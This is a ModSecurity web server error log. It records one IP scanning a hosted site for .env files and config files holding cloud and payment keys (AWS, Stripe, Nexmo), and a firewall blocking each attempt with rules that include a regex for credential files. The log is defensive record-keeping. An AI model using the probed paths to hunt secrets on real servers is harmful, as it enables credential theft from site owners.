[Tue May 26 13:04:18.182064 2026] [security2:error] [pid 470766:tid 470937] [client 195.178.110.199:43324] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/client/.env"] [unique_id "ahVM-ujO_W1DqEcFHQ4IGAAAACk"]
[Tue May 26 13:04:18.399128 2026] [http2:info] [pid 485064:tid 485064] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 13:04:18.413480 2026] [security2:error] [pid 485064:tid 485195] [client 195.178.110.199:45538] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/beta/.env"] [unique_id "ahVM-j9tlF55stOmSqH5iQAAAIY"]
[Tue May 26 13:04:18.451460 2026] [security2:error] [pid 485064:tid 485194] [client 195.178.110.199:45572] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-j9tlF55stOmSqH5igAAAIU"]
[Tue May 26 13:04:18.576491 2026] [security2:error] [pid 485064:tid 485201] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-j9tlF55stOmSqH5kAAAAIw"]
[Tue May 26 13:04:18.602325 2026] [security2:error] [pid 485064:tid 485200] [client 195.178.110.199:45538] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-j9tlF55stOmSqH5kQAAAIs"]
[Tue May 26 13:04:18.703291 2026] [security2:error] [pid 485064:tid 485213] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-j9tlF55stOmSqH5nQAAAJg"]
[Tue May 26 13:04:18.705510 2026] [security2:error] [pid 485064:tid 485210] [client 195.178.110.199:45634] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-j9tlF55stOmSqH5mQAAAJU"]
[Tue May 26 13:04:18.708200 2026] [security2:error] [pid 485064:tid 485217] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-j9tlF55stOmSqH5ngAAAJw"]
[Tue May 26 13:04:18.721189 2026] [security2:error] [pid 485064:tid 485218] [client 195.178.110.199:45650] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-j9tlF55stOmSqH5nwAAAJ0"]
[Tue May 26 13:04:18.734422 2026] [security2:error] [pid 485064:tid 485228] [client 195.178.110.199:45656] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-j9tlF55stOmSqH5oAAAAKc"]
[Tue May 26 13:04:18.806259 2026] [security2:error] [pid 485064:tid 485235] [client 195.178.110.199:45588] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/config.php"] [unique_id "ahVM-j9tlF55stOmSqH5qgAAAK4"]
[Tue May 26 13:04:18.810742 2026] [security2:error] [pid 485064:tid 485227] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-j9tlF55stOmSqH5pQAAAKY"]
[Tue May 26 13:04:18.821471 2026] [security2:error] [pid 485064:tid 485231] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-j9tlF55stOmSqH5qQAAAKo"]
[Tue May 26 13:04:18.854076 2026] [security2:error] [pid 485064:tid 485243] [client 195.178.110.199:45634] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/config/aws.php"] [unique_id "ahVM-j9tlF55stOmSqH5rwAAALY"]
[Tue May 26 13:04:18.862451 2026] [security2:error] [pid 485064:tid 485250] [client 195.178.110.199:45604] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/config/config.inc.php"] [unique_id "ahVM-j9tlF55stOmSqH5tgAAAL0"]
[Tue May 26 13:04:18.881486 2026] [security2:error] [pid 485064:tid 485268] [client 195.178.110.199:45656] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/config/config.php"] [unique_id "ahVM-j9tlF55stOmSqH5ugAAAM8"]
[Tue May 26 13:04:18.885953 2026] [security2:error] [pid 485064:tid 485246] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-j9tlF55stOmSqH5swAAALk"]
[Tue May 26 13:04:18.899596 2026] [security2:error] [pid 485064:tid 485243] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-j9tlF55stOmSqH5sAAAALY"]
[Tue May 26 13:04:18.904854 2026] [security2:error] [pid 485064:tid 485267] [client 195.178.110.199:45650] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-j9tlF55stOmSqH5uQAAAM4"]
[Tue May 26 13:04:18.907053 2026] [security2:error] [pid 485064:tid 485248] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-j9tlF55stOmSqH5tAAAALs"]
[Tue May 26 13:04:18.914189 2026] [security2:error] [pid 485064:tid 485266] [client 195.178.110.199:45572] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-j9tlF55stOmSqH5uAAAAM0"]
[Tue May 26 13:04:18.946914 2026] [security2:error] [pid 485064:tid 485275] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-j9tlF55stOmSqH5vgAAANY"]
[Tue May 26 13:04:18.960750 2026] [security2:error] [pid 485064:tid 485263] [client 195.178.110.199:45664] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/config/.env"] [unique_id "ahVM-j9tlF55stOmSqH5vwAAAMo"]
[Tue May 26 13:04:19.006035 2026] [security2:error] [pid 485064:tid 485264] [client 195.178.110.199:45684] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-j9tlF55stOmSqH5wAAAAMs"]
[Tue May 26 13:04:19.023076 2026] [security2:error] [pid 485064:tid 485288] [client 195.178.110.199:45716] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-j9tlF55stOmSqH5wwAAAOM"]
[Tue May 26 13:04:19.064103 2026] [security2:error] [pid 485064:tid 485278] [client 195.178.110.199:45572] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/config/nexmo.php"] [unique_id "ahVM-z9tlF55stOmSqH5yQAAANk"]
[Tue May 26 13:04:19.075340 2026] [security2:error] [pid 485064:tid 485277] [client 195.178.110.199:45688] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-z9tlF55stOmSqH5yAAAANg"]
[Tue May 26 13:04:19.145279 2026] [security2:error] [pid 485064:tid 485316] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-z9tlF55stOmSqH51AAAAP8"]
[Tue May 26 13:04:19.190002 2026] [security2:error] [pid 485064:tid 485300] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-z9tlF55stOmSqH52wAAAO8"]
[Tue May 26 13:04:19.302298 2026] [security2:error] [pid 485064:tid 485319] [client 195.178.110.199:45692] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-z9tlF55stOmSqH53wAAAQI"]
[Tue May 26 13:04:19.331310 2026] [security2:error] [pid 485064:tid 485207] [client 195.178.110.199:45730] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/config/env.php"] [unique_id "ahVM-z9tlF55stOmSqH54gAAAJI"]
[Tue May 26 13:04:19.356639 2026] [security2:error] [pid 485064:tid 485220] [client 195.178.110.199:45770] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/config/module.config.php"] [unique_id "ahVM-z9tlF55stOmSqH55gAAAJ8"]
[Tue May 26 13:04:19.374135 2026] [security2:error] [pid 485064:tid 485198] [client 195.178.110.199:45614] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-z9tlF55stOmSqH54wAAAIk"]
[Tue May 26 13:04:19.399134 2026] [security2:error] [pid 485064:tid 485219] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-z9tlF55stOmSqH55wAAAJ4"]
[Tue May 26 13:04:19.402175 2026] [security2:error] [pid 485064:tid 485221] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-z9tlF55stOmSqH56AAAAKA"]
[Tue May 26 13:04:19.584356 2026] [security2:error] [pid 485064:tid 485253] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-z9tlF55stOmSqH5-wAAAMA"]
[Tue May 26 13:04:19.584784 2026] [security2:error] [pid 485064:tid 485246] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-z9tlF55stOmSqH5-gAAALk"]
[Tue May 26 13:04:19.605158 2026] [security2:error] [pid 485064:tid 485317] [client 146.174.178.101:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVM-z9tlF55stOmSqH51QAAAQA"]
[Tue May 26 13:04:19.716252 2026] [security2:error] [pid 485064:tid 485260] [client 195.178.110.199:45664] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-z9tlF55stOmSqH6BgAAAMc"]
[Tue May 26 13:04:19.764160 2026] [security2:error] [pid 485064:tid 485264] [client 195.178.110.199:45574] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM-z9tlF55stOmSqH6CAAAAMs"]
[Tue May 26 13:04:19.939393 2026] [security2:error] [pid 485064:tid 485229] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVM-z9tlF55stOmSqH59QAAAKg"]
[Tue May 26 13:04:20.149806 2026] [security2:error] [pid 485064:tid 485312] [client 195.178.110.199:45716] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_D9tlF55stOmSqH6HQAAAPs"]
[Tue May 26 13:04:20.195674 2026] [security2:error] [pid 485064:tid 485252] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_D9tlF55stOmSqH6IQAAAL8"]
[Tue May 26 13:04:20.342023 2026] [security2:error] [pid 485064:tid 485069] [remote 193.42.61.12:35888] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.61.42.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahVM_D9tlF55stOmSqH6HgAAkwQ"]
[Tue May 26 13:04:20.342225 2026] [security2:error] [pid 485064:tid 485221] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_D9tlF55stOmSqH6JwAAAKA"]
[Tue May 26 13:04:20.389801 2026] [security2:error] [pid 485064:tid 485205] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_D9tlF55stOmSqH6LQAAAJA"]
[Tue May 26 13:04:20.565308 2026] [security2:error] [pid 485064:tid 485242] [client 195.178.110.199:45706] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_D9tlF55stOmSqH6OgAAALU"]
[Tue May 26 13:04:20.620448 2026] [security2:error] [pid 485064:tid 485269] [client 195.178.110.199:45786] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/config/stripe.php"] [unique_id "ahVM_D9tlF55stOmSqH6QgAAANA"]
[Tue May 26 13:04:20.649187 2026] [security2:error] [pid 485064:tid 485256] [client 195.178.110.199:45664] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_D9tlF55stOmSqH6QQAAAMM"]
[Tue May 26 13:04:20.657677 2026] [security2:error] [pid 485064:tid 485317] [client 195.178.110.199:45780] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_D9tlF55stOmSqH6QwAAAQA"]
[Tue May 26 13:04:20.680420 2026] [security2:error] [pid 485064:tid 485282] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_D9tlF55stOmSqH6RgAAAN0"]
[Tue May 26 13:04:20.711574 2026] [security2:error] [pid 485064:tid 485255] [client 195.178.110.199:45754] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_D9tlF55stOmSqH6RwAAAMI"]
[Tue May 26 13:04:20.744080 2026] [security2:error] [pid 485064:tid 485260] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_D9tlF55stOmSqH6TwAAAMc"]
[Tue May 26 13:04:20.744605 2026] [security2:error] [pid 485064:tid 485209] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_D9tlF55stOmSqH6TAAAAJQ"]
[Tue May 26 13:04:20.785522 2026] [security2:error] [pid 485064:tid 485320] [client 195.178.110.199:45706] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/cron/.env"] [unique_id "ahVM_D9tlF55stOmSqH6VwAAAQM"]
[Tue May 26 13:04:20.812860 2026] [security2:error] [pid 485064:tid 485318] [client 195.178.110.199:45614] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_D9tlF55stOmSqH6VQAAAQE"]
[Tue May 26 13:04:20.815832 2026] [security2:error] [pid 485064:tid 485278] [client 195.178.110.199:45574] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_D9tlF55stOmSqH6WAAAANk"]
[Tue May 26 13:04:20.896878 2026] [security2:error] [pid 485064:tid 485239] [client 195.178.110.199:45670] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/current/.env"] [unique_id "ahVM_D9tlF55stOmSqH6WgAAALI"]
[Tue May 26 13:04:20.927984 2026] [security2:error] [pid 485064:tid 485204] [client 195.178.110.199:45688] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/demo/.env"] [unique_id "ahVM_D9tlF55stOmSqH6WwAAAI8"]
[Tue May 26 13:04:21.038101 2026] [security2:error] [pid 485064:tid 485319] [client 195.178.110.199:45620] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/crm/.env"] [unique_id "ahVM_T9tlF55stOmSqH6ZwAAAQI"]
[Tue May 26 13:04:21.061266 2026] [security2:error] [pid 485064:tid 485301] [client 195.178.110.199:45614] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_T9tlF55stOmSqH6ZAAAAPA"]
[Tue May 26 13:04:21.065449 2026] [security2:error] [pid 485064:tid 485315] [client 195.178.110.199:45716] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM_T9tlF55stOmSqH6ZQAAAP4"]
[Tue May 26 13:04:21.084443 2026] [security2:error] [pid 485064:tid 485207] [client 195.178.110.199:45780] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/developer/.env"] [unique_id "ahVM_T9tlF55stOmSqH6awAAAJI"]
